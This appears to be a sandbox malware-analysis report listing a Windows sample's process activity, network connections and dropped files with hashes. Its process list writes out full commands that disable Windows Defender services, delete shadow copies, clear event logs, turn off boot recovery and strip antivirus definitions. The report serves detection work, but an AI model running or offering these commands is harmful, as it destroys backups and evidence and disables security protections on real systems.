C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | geo.prod.do.dsp.mp.microsoft.com | udp |
| US | 52.143.86.214:443 | geo.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | kv801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 184.29.205.60:443 | kv801.prod.do.dsp.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | cp801.prod.do.dsp.mp.microsoft.com | udp |
| NL | 23.66.26.147:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
| NL | 23.66.26.147:443 | cp801.prod.do.dsp.mp.microsoft.com | tcp |
Files
memory/3880-134-0x00000221ECC90000-0x00000221ECCB2000-memory.dmp
memory/3880-137-0x00000221EBAF3000-0x00000221EBAF5000-memory.dmp
memory/3880-139-0x00000221EC6B3000-0x00000221EC6B5000-memory.dmp
memory/3880-138-0x00000221EC6B0000-0x00000221EC6B2000-memory.dmp
memory/3880-140-0x00000221EC6B6000-0x00000221EC6B8000-memory.dmp
memory/3880-141-0x00000221EC6B8000-0x00000221EC6B9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\ProgramData\USOShared\Logs\User\NotifyIcon.6f243341-f968-41e2-b188-9cf12fb6cd1a.1.etl
| MD5 | 0c8a9a1f89abf90e8904850ed895ddf3 |
| SHA1 | 0e330c2223743b5e434be6ef1b64c19fad7467c6 |
| SHA256 | 0af4222534e5626f934eea7e401a823e72eb8bbd0690f0e63b8d044126ad3843 |
| SHA512 | c9d14b0167fda73f42a76923ff8d25ddd82b1dc0ab3f3978957ab83f1fd267b03fe5a174b60d375b3225a6de09abc94d7573d8e4382d60c8258bea791d36dd07 |